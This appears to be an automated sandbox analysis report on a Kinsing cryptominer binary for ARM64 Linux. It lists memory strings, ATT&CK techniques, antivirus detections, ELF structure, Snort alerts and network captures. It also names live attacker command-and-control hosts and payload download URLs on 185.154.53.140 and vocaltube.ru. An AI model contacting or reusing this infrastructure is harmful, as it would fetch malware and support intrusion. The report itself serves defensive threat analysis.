Source: kinsing_aarch64.elf	Binary or memory string: ]\ufffdaacuteacceptactiveagraveallowalpineamazonatildebase64brvbarccedilcgroupchan<-closedcookiecoreoscurrendaggerdebiandefinedividedockerdomaineacuteefenceegraveempty errno exec: expectfedoraforallfrac12frac14frac34gentoogopherhangupheaderheartshellipiacuteigraveip+netiquestisZeusisbn10isbn13killedkrongolambdalengthlfloorlistenloggerlowastlsaquomethodmiddotmin %sminutemodulendots:netdnsntildenumberoacuteobjectoffsetograveonlineopenvzoracleosNameoslashotildeotimespermilplusmnproc redhatremoteremoverenamerequrirequrlreturnrfloorrsapubrsaquorune1 scaronsecondselectsemverserversigmafsocketsocks socks5spadessplicestatusstringstructsweep sysmonsystemtelnetthere4thinsptimersuacuteubuntuugraveuint16uint32uint64unuseduptimeuuidv3uuidv4uuidv5vmwarewaitidweierpx2_armxmlns:yacutezombie %v=%v, (conn) (scan (scan) (trap MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= s=nil
Source: kinsing_aarch64.elf, 6209.1.00005640cb07d000.00005640cb5c4000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/aarch64
Source: kinsing_aarch64.elf, 6209.1.00005640cb07d000.00005640cb5c4000.rw-.sdmp	Binary or memory string: @V1/etc/qemu-binfmt/aarch64O
Source: kinsing_aarch64.elf, 6209.1.00007ffe24943000.00007ffe24964000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-aarch64/tmp/kinsing_aarch64.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/kinsing_aarch64.elf
Source: kinsing_aarch64.elf	Binary or memory string: le)Other_AlphabeticPapua New GuineaPayment RequiredProxy-ConnectionQEMU Virtual CPURCodeFormatErrorSETTINGS_TIMEOUTSIGNONE: no trapSeychelles (les)SignatureScheme(Tadjikistan (le)Timor-Leste (le)Upgrade RequiredUser-Agent: %s
Source: kinsing_aarch64.elf, 6209.1.00005640cb07d000.00005640cb5c4000.rw-.sdmp	Binary or memory string: @Vrg.qemu.gdb.arm.sys.regs">
Source: kinsing_aarch64.elf	Binary or memory string: (MISSING)(deleted)(unknown), newval=, oldval=, plugin:, size = , tail = /dev/null/dev/shm//var/lock2001::/322002::/162441406253ffe::/16: status=; Domain=ArgentinaAustraliaAuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFIN_WAIT1FIN_WAIT2ForbiddenGibraltarGreenlandGuatemalaGuerneseyHOST_PROCHex_DigitHong KongInde (l')IndonesiaInheritedInstMatchInstRune1InterfaceIraq (l')KhudawadiLithuaniaMalayalamMali (le)MauritiusMongolianNabataeanNicaraguaNot FoundPalmyreneParseBoolParseUintSamaritanSee OtherSeptemberSingaporeSingapourSri LankaSundaneseSwazilandTIME_WAITTogo (le)Too EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyWednesday[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8attempts:bad indirbad prunebus errorchan sendchmod +x chmod: %scomplex64continuedcontrol_dcopystackcpu-totalctxt != 0d.nx != 0debugLockdns,fileselement <empty keyempty urlenvconfigfec0::/10files,dnsfont/wofffork/execfullwidthfuncargs(get errorget fileshalfwidthhchanLeafimage/bmpimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplinuxmintlocalhostlocaltimelongitudelowercasemSpanDeadmSpanFreemkdirtempmultibytenew proc newosprocnil errornil traceomitemptyosVersionpanicwaitpreemptedprotocol questionsrecover: reflect: rwxrwxrwxs decoderscavtraceshortfileshortfuncsignal 32signal 33signal 34signal 35signal 36signal 37signal 38signal 39signal 40signal 41signal 42signal 43signal 44signal 45signal 46signal 47signal 48signal 49signal 50signal 51signal 52signal 53signal 54signal 55signal 56signal 57signal 58signal 59signal 60signal 61signal 62signal 63signal 64slackwaresocks5://stackpoolsucceededtracebackunderflowunhandleduppercaseutflettervboxguestvideo/avivideo/mp4wbufSpanswebsocketxenserver} stack=[ (deleted) MB goal, actual
Source: kinsing_aarch64.elf, 6209.1.00005640cb07d000.00005640cb5c4000.rw-.sdmp	Binary or memory string: rg.qemu.gdb.arm.sys.regs">
Source: kinsing_aarch64.elf, 6209.1.00007ffe24943000.00007ffe24964000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-aarch64
Source: kinsing_aarch64.elf	Binary or memory string: alpineamazonatildebase64brvbarccedilcgroupchan<-closedcookiecoreoscurrendaggerdebiandefinedividedockerdomaineacuteefenceegraveempty errno exec: expectfedoraforallfrac12frac14frac34gentoogopherhangupheaderheartshellipiacuteigraveip+netiquestisZeusisbn10isbn13killedkrongolambdalengthlfloorlistenloggerlowastlsaquomethodmiddotmin %sminutemodulendots:netdnsntildenumberoacuteobjectoffsetograveonlineopenvzoracleosNameoslashotildeotimespermilplusmnproc redhatremoteremoverenamerequrirequrlreturnrfloorrsapubrsaquorune1 scaronsecondselectsemverserversigmafsocketsocks socks5spadessplicestatusstringstructsweep sysmonsystemtelnetthere4thinsptimersuacuteubuntuugraveuint16uint32uint64unuseduptimeuuidv3uuidv4uuidv5vmwarewaitidweierpx2_armxmlns:yacutezombie %v=%v, (conn) (scan (scan) (trap MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= s=nil

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	1 Scripting	Path Interception	Path Interception	1 Disable or Modify Tools	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Scripting	LSASS Memory	3 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Non-Application Layer Protocol	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	1 Ingress Tool Transfer			Data Destruction	Virtual Private Server	Employee Names

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kinsing_aarch64.elf	55%	ReversingLabs	Linux.Trojan.Malxmr
kinsing_aarch64.elf	100%	Avira	LINUX/CoinMiner.otikr

Source	Detection	Scanner	Label
http://185.61.7.8;http://67.205.161.58;http://104.248.3.165runtime:	0%	Avira URL Cloud	safe
https://vocaltube.ru/ms	0%	Avira URL Cloud	safe
http://185.154.53.140/mu	100%	Avira URL Cloud	malware
http://185.154.53.140/ki	100%	Avira URL Cloud	malware
https://vocaltube.ru/ki	0%	Avira URL Cloud	safe
http://47.65.90.240if-unmodified-sinceillegal	0%	Avira URL Cloud	safe
https://vocaltube.ru/get	0%	Avira URL Cloud	safe
http://185.154.53.140/h2	100%	Avira URL Cloud	malware
http://185.154.53.140/ms	100%	Avira URL Cloud	malware
https://vocaltube.ru/mg	0%	Avira URL Cloud	safe
http://185.154.53.140/l	100%	Avira URL Cloud	malware
https://vocaltube.ru/mu	0%	Avira URL Cloud	safe
http://185.154.53.140/s	100%	Avira URL Cloud	malware
http://185.154.53.140/get	100%	Avira URL Cloud	malware
https://vocaltube.ru/s	0%	Avira URL Cloud	safe
http://api.ipify.orgi/o	0%	Avira URL Cloud	safe
https://vocaltube.ru/l	0%	Avira URL Cloud	safe
http://185.154.53.140/mg	100%	Avira URL Cloud	malware
http://ifconfig.coidentifier	0%	Avira URL Cloud	safe
http://ipv4.icanhazip.comillegal	0%	Avira URL Cloud	safe
https://vocaltube.ru/h2	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
vocaltube.ru	185.154.53.140	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://vocaltube.ru/mg	true	Avira URL Cloud: safe	unknown
https://vocaltube.ru/get	true	Avira URL Cloud: safe	unknown
https://vocaltube.ru/ki	true	Avira URL Cloud: safe	unknown
http://185.154.53.140/ki	true	Avira URL Cloud: malware	unknown
http://185.154.53.140/h2	true	Avira URL Cloud: malware	unknown
http://185.154.53.140/mu	true	Avira URL Cloud: malware	unknown
https://vocaltube.ru/ms	true	Avira URL Cloud: safe	unknown
http://185.154.53.140/ms	true	Avira URL Cloud: malware	unknown
http://185.154.53.140/l	true	Avira URL Cloud: malware	unknown
https://vocaltube.ru/mu	true	Avira URL Cloud: safe	unknown
https://vocaltube.ru/h2	true	Avira URL Cloud: safe	unknown
http://185.154.53.140/s	true	Avira URL Cloud: malware	unknown
http://185.154.53.140/get	true	Avira URL Cloud: malware	unknown
https://vocaltube.ru/s	true	Avira URL Cloud: safe	unknown
https://vocaltube.ru/l	true	Avira URL Cloud: safe	unknown
http://185.154.53.140/mg	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.61.7.8;http://67.205.161.58;http://104.248.3.165runtime:	kinsing_aarch64.elf	false	Avira URL Cloud: safe	low
http://47.65.90.240if-unmodified-sinceillegal	kinsing_aarch64.elf	false	Avira URL Cloud: safe	low
http://api.ipify.orgi/o	kinsing_aarch64.elf	false	Avira URL Cloud: safe	unknown
http://ifconfig.coidentifier	kinsing_aarch64.elf	false	Avira URL Cloud: safe	unknown
http://ipv4.icanhazip.comillegal	kinsing_aarch64.elf	false	Avira URL Cloud: safe	unknown
https://github.com/go-resty/resty)got	kinsing_aarch64.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
212.22.77.79	unknown	Russian Federation	202933	CLOUDSOLUTIONSRU	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
185.154.53.140	vocaltube.ru	Russian Federation	210079	EUROBYTEEurobyteLLCMoscowRussiaRU	true
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
212.22.77.79	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79/ms
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79/ms
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79/ms
	kinsing	Get hash	malicious	Kinsing	Browse	212.22.77.79/mu
	LEYBfuZQV6.elf	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79/ms
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79/mu
109.202.202.202	http://45.95.146.26/g/x86	Get hash	malicious	Unknown	Browse
	my_miner_test	Get hash	malicious	Xmrig	Browse
	3bEvPJYNHw.elf	Get hash	malicious	Mirai	Browse
	qYGEPNkazg.elf	Get hash	malicious	Unknown	Browse
	arm-20231127-1933.elf	Get hash	malicious	Unknown	Browse
	x86_64-20231127-1933.elf	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Linux.Packed.1241.31665.27695.elf	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.Linux.BtcMine.9999.5965.11737.elf	Get hash	malicious	Xmrig	Browse
	VIRNZOTqWa.elf	Get hash	malicious	Unknown	Browse
	eHmscqICHG.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	vsL6ORByI3.elf	Get hash	malicious	Unknown	Browse
	XTodlTojbl.elf	Get hash	malicious	Mirai	Browse
	5oooY30cST.elf	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.ELF.Mirai-CLZ.14797.9662.elf	Get hash	malicious	Unknown	Browse
	SePGbmCTYu.elf	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.ELF.Mirai-CLZ.13548.1196.elf	Get hash	malicious	Unknown	Browse
	mips-20231125-2108.elf	Get hash	malicious	Unknown	Browse
	arm7-20231125-2109.elf	Get hash	malicious	Mirai	Browse
	SecuriteInfo.com.ELF.Mirai-CLZ.11900.31985.elf	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.ELF.Mirai-CLZ.9952.8166.elf	Get hash	malicious	Unknown	Browse
185.154.53.140	kinsing.unknown	Get hash	malicious	Kinsing	Browse	185.154.53.140/ms
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	185.154.53.140/h2
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	185.154.53.140/h2
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	185.154.53.140/h2
	kinsing	Get hash	malicious	Kinsing	Browse	185.154.53.140/h2
	LEYBfuZQV6.elf	Get hash	malicious	Kinsing, Xmrig	Browse	185.154.53.140/h2
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	185.154.53.140/h2
	fFpZ8kinsing	Get hash	malicious	Xmrig	Browse	185.154.53.140/s
	kinsing	Get hash	malicious	Xmrig	Browse	185.154.53.140/s
	194.38.20.199_tf.sh	Get hash	malicious	Xmrig	Browse	185.154.53.140/o
	kinsing2	Get hash	malicious	Xmrig	Browse	185.154.53.140/mg
	kinsing	Get hash	malicious	Xmrig	Browse	185.154.53.140/mg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
vocaltube.ru	kinsing.unknown	Get hash	malicious	Kinsing	Browse	185.154.53.140

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDSOLUTIONSRU	kinsing.unknown	Get hash	malicious	Kinsing	Browse	212.22.77.79
	http://glinkseclin.com	Get hash	malicious	Unknown	Browse	45.133.216.123
	Setup.exe	Get hash	malicious	Unknown	Browse	45.133.216.192
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79
	X3hHhwNP8P.exe	Get hash	malicious	DcRat	Browse	45.142.213.194
	TBF9V5kwyJ.exe	Get hash	malicious	DcRat	Browse	45.142.213.194
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79
	ZsIr6Z3AvQ.exe	Get hash	malicious	Unknown	Browse	45.133.216.192
	JtXMZAttwD.exe	Get hash	malicious	RedLine	Browse	45.142.213.106
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79
	kinsing	Get hash	malicious	Kinsing	Browse	212.22.77.79
	LEYBfuZQV6.elf	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79
	2.exe	Get hash	malicious	Clipboard Hijacker, Raccoon Stealer v2	Browse	45.142.213.24
	kinsing	Get hash	malicious	Kinsing, Xmrig	Browse	212.22.77.79
	dot_systemd-private-70aUSGlIav3mga37PelyufeRPfSl2i4.sh	Get hash	malicious	Unknown	Browse	45.142.213.67
	Test.sh	Get hash	malicious	Unknown	Browse	45.142.213.67
	Setup.exe	Get hash	malicious	RedLine	Browse	45.142.215.180
	21ABA879CA90E3D4B3B58F61316B6B42C97D31F62DEA2.exe	Get hash	malicious	RedLine SmokeLoader Socelars Vidar	Browse	45.142.215.47
	991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe	Get hash	malicious	Cookie Stealer RedLine SmokeLoader Socelars	Browse	45.142.215.47
	22BA4262D93379DE524029DAFC7528E431E56A22CB293.exe	Get hash	malicious	RedLine SmokeLoader Socelars	Browse	45.142.215.47
EUROBYTEEurobyteLLCMoscowRussiaRU	7Ueun89KE3.elf	Get hash	malicious	Mirai	Browse	95.142.40.157
	BpSsm2RxvM.elf	Get hash	malicious	Mirai	Browse	95.142.40.163
	5MPcAq42ts.elf	Get hash	malicious	Mirai	Browse	95.142.40.185
	FVShYxZJpc.elf	Get hash	malicious	Mirai	Browse	95.142.40.152
	h7TOIMgvTM.elf	Get hash	malicious	Mirai	Browse	95.142.40.155
	kinsing.unknown	Get hash	malicious	Kinsing	Browse	185.154.53.140
	GRipLsZPVA.elf	Get hash	malicious	Mirai	Browse	95.142.40.188
	Vs8pIMtfLG.elf	Get hash	malicious	Mirai	Browse	95.142.40.155
	gIiioxasH6.elf	Get hash	malicious	Mirai	Browse	95.142.40.188
	64CU11Bnfr.elf	Get hash	malicious	Mirai	Browse	95.142.40.137
	ONZRjy4HYK.elf	Get hash	malicious	Mirai	Browse	95.142.40.178
	ydCnn3mbyi.elf	Get hash	malicious	Mirai	Browse	95.142.39.253
	arm.elf	Get hash	malicious	Mirai	Browse	95.142.40.168
	http://lt-50-9897757715.dcc99.ru	Get hash	malicious	Unknown	Browse	95.142.44.68
	f2ft25pxN1.exe	Get hash	malicious	Amadey, Xmrig, lolMiner	Browse	46.30.40.102
	SzNV36Gpbb.exe	Get hash	malicious	Amadey, Xmrig, lolMiner	Browse	46.30.40.102
	armv7l-20230709-1715.elf	Get hash	malicious	Mirai	Browse	95.142.40.134
	miori.arm7.elf	Get hash	malicious	Mirai	Browse	95.142.40.148
	ACp6pRv2ao.elf	Get hash	malicious	Mirai	Browse	95.142.39.238
	mpsl-20230704-0803.elf	Get hash	malicious	Mirai, Moobot	Browse	95.142.39.238
INIT7CH	http://45.95.146.26/g/x86	Get hash	malicious	Unknown	Browse	109.202.202.202
	my_miner_test	Get hash	malicious	Xmrig	Browse	109.202.202.202
	3bEvPJYNHw.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	qYGEPNkazg.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm-20231127-1933.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	x86_64-20231127-1933.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	SecuriteInfo.com.Linux.Packed.1241.31665.27695.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	SecuriteInfo.com.PUA.Tool.Linux.BtcMine.9999.5965.11737.elf	Get hash	malicious	Xmrig	Browse	109.202.202.202
	VIRNZOTqWa.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	eHmscqICHG.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	vsL6ORByI3.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	XTodlTojbl.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	5oooY30cST.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	SecuriteInfo.com.ELF.Mirai-CLZ.14797.9662.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	SePGbmCTYu.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	SecuriteInfo.com.ELF.Mirai-CLZ.13548.1196.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	mips-20231125-2108.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm7-20231125-2109.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	SecuriteInfo.com.ELF.Mirai-CLZ.11900.31985.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	SecuriteInfo.com.ELF.Mirai-CLZ.9952.8166.elf	Get hash	malicious	Unknown	Browse	109.202.202.202

Process:	/tmp/kinsing_aarch64.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.59295555885434
Encrypted:	false
SSDEEP:	3:9+JsTBIcGAuU4g:gGTicGm4g
MD5:	A3886712D53E7001318ED799FB55659F
SHA1:	3A06BD3A0C13BC0CBDD1DC00B62F56BCFB1862F4
SHA-256:	7F1130CD1B1DA9ED0384DA384556ED856F2F6A42EFD886B8BF35998890818BEB
SHA-512:	DDBED4589E9DFB01E5D7D34BB6E8187BF3D723B7F206B76FA5B7CBAAAC69B12E021D53A006500E133874C468A969BA05DE1009E9EB3C41974B596248A1CC2A3A
Malicious:	false
Reputation:	low
Preview:	8943ba3c-3f37-46d8-69ce-6633309867a5

Static File Info

General

File type:	ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, Go BuildID=-BLSpyMGLCK5GzhaJ3UA/N9IdSQtvMbeLOr_SvC71/4E8BLxX6iTBxVEB-0nJ3/_WzQUHCEnCy6OU3vIcaU, stripped
Entropy (8bit):	5.8895241273672765
TrID:	ELF Executable and Linkable format (generic) (4004/1) 98.45% Lumena CEL bitmap (63/63) 1.55%
File name:	kinsing_aarch64.elf
File size:	5'898'240 bytes
MD5:	da753ebcfe793614129fc11890acedbc
SHA1:	ee458e526125d60cc1a387b4163376be8e9bc689
SHA256:	c6fbd6896d162a12d9c900056781eb82f44649945808b7b009646b5397bcf6bf
SHA512:	e3a95222cc951db48eaa26dd5305c56b3475eb9c3a8e82625a5f3df3545ccd47d61f916f6efa326d00b3a3fa435a7079dd6b6f65e3d3fc6621b1b71d2273de6f
SSDEEP:	98304:Slds3UPXBQSH14vZh7pIDhG9By8uCGUGan5UPiK/AF7XlzcKGYH0ye8nanVFflpu:ZUDIaLbI+ED2iJ
TLSH:	78564B02BC5DB563E9CC7630777683D9323E7588CBA14233AA64EE7D99F13688E17121
File Content Preview:	.ELF............................@...................@.8...@.............@.......@.......@...............................................................d.......d............................................... .)..... .).......................*.......+....

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	AArch64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x789e0
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	7
Section Header Offset:	456
Section Header Size:	64
Number of Section Headers:	14
Header String Table Index:	3

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x11000	0x1000	0x29af20	0x0	0x6	AX	16
.rodata	PROGBITS	0x2b0000	0x2a0000	0x10955c	0x0	0x2	A	32
.shstrtab	STRTAB	0x0	0x3a9560	0xa5	0x0	0x0		1
.typelink	PROGBITS	0x3b9620	0x3a9620	0x1860	0x0	0x2	A	32
.itablink	PROGBITS	0x3bae80	0x3aae80	0x990	0x0	0x2	A	32
.gosymtab	PROGBITS	0x3bb810	0x3ab810	0x0	0x0	0x2	A	1
.gopclntab	PROGBITS	0x3bb820	0x3ab820	0x17c988	0x0	0x2	A	32
.go.buildinfo	PROGBITS	0x540000	0x530000	0x20	0x0	0x3	WA	16
.noptrdata	PROGBITS	0x540020	0x530020	0x52260	0x0	0x3	WA	32
.data	PROGBITS	0x592280	0x582280	0x12390	0x0	0x3	WA	32
.bss	NOBITS	0x5a4620	0x594620	0x326a8	0x0	0x3	WA	32
.noptrbss	NOBITS	0x5d6ce0	0x5c6ce0	0x7d28	0x0	0x3	WA	32
.note.go.buildid	NOTE	0x10f9c	0xf9c	0x64	0x0	0x2	A	4

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
PHDR	0x40	0x10040	0x10040	0x188	0x188	1.4931	0x4	R	0x10000
NOTE	0xf9c	0x10f9c	0x10f9c	0x64	0x64	5.2959	0x4	R	0x4	.note.go.buildid
LOAD	0x0	0x10000	0x10000	0x29bf20	0x29bf20	6.1047	0x5	R E	0x10000	.text .note.go.buildid
LOAD	0x2a0000	0x2b0000	0x2b0000	0x2881a8	0x2881a8	5.0945	0x4	R	0x10000	.rodata .typelink .itablink .gosymtab .gopclntab
LOAD	0x530000	0x540000	0x540000	0x64620	0x9ea08	6.0600	0x6	RW	0x10000	.go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8
LOOS+5041580	0x0	0x0	0x0	0x0	0x0	0.0000	0x2a00		0x8

Network Behavior

Download Network PCAP: filtered – full

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.23185.154.53.14051178802030108 11/29/23-18:00:28.364246	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51178	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051162802030108 11/29/23-18:00:06.985572	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51162	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051166802030108 11/29/23-18:00:09.294226	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51166	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051198802030108 11/29/23-18:00:33.079065	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51198	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051174802030108 11/29/23-18:00:14.025607	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51174	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051178802030109 11/29/23-18:00:28.364246	TCP	2030109	ET TROJAN nspps Backdoor - Sending SOCKS Details	51178	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051180802030108 11/29/23-18:00:28.364585	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51180	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051204802030108 11/29/23-18:00:36.347754	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51204	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051170802030108 11/29/23-18:00:11.590604	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51170	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051190802030108 11/29/23-18:00:30.732714	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51190	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051192802030108 11/29/23-18:00:30.771353	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51192	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051158802030108 11/29/23-18:00:04.674507	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51158	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051150802030108 11/29/23-17:59:58.397598	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51150	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051182802030108 11/29/23-18:00:28.368160	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51182	80	192.168.2.23	185.154.53.140
192.168.2.23185.154.53.14051154802030108 11/29/23-18:00:02.260802	TCP	2030108	ET TROJAN nspps Backdoor CnC Activity	51154	80	192.168.2.23	185.154.53.140

Network Port Distribution

Total Packets: 293
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2023 17:58:48.716458082 CET	43928	443	192.168.2.23	91.189.91.42
Nov 29, 2023 17:58:54.347439051 CET	42836	443	192.168.2.23	91.189.91.43
Nov 29, 2023 17:58:55.115459919 CET	42516	80	192.168.2.23	109.202.202.202
Nov 29, 2023 17:59:09.449635029 CET	43928	443	192.168.2.23	91.189.91.42
Nov 29, 2023 17:59:21.735747099 CET	42836	443	192.168.2.23	91.189.91.43
Nov 29, 2023 17:59:25.831274033 CET	42516	80	192.168.2.23	109.202.202.202
Nov 29, 2023 17:59:50.403971910 CET	43928	443	192.168.2.23	91.189.91.42
Nov 29, 2023 17:59:58.019480944 CET	51150	80	192.168.2.23	185.154.53.140
Nov 29, 2023 17:59:58.379829884 CET	80	51150	185.154.53.140	192.168.2.23
Nov 29, 2023 17:59:58.380043030 CET	51150	80	192.168.2.23	185.154.53.140
Nov 29, 2023 17:59:58.397598028 CET	51150	80	192.168.2.23	185.154.53.140
Nov 29, 2023 17:59:58.757208109 CET	80	51150	185.154.53.140	192.168.2.23
Nov 29, 2023 17:59:58.758219004 CET	80	51150	185.154.53.140	192.168.2.23
Nov 29, 2023 17:59:58.758270979 CET	80	51150	185.154.53.140	192.168.2.23
Nov 29, 2023 17:59:58.758388042 CET	51150	80	192.168.2.23	185.154.53.140
Nov 29, 2023 17:59:58.773400068 CET	51150	80	192.168.2.23	185.154.53.140
Nov 29, 2023 17:59:59.035695076 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 17:59:59.035727024 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 17:59:59.035810947 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 17:59:59.044286013 CET	52160	443	192.168.2.23	185.154.53.140
Nov 29, 2023 17:59:59.044301987 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 17:59:59.132946014 CET	80	51150	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.133363008 CET	443	52160	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:00.133430004 CET	52160	443	192.168.2.23	185.154.53.140
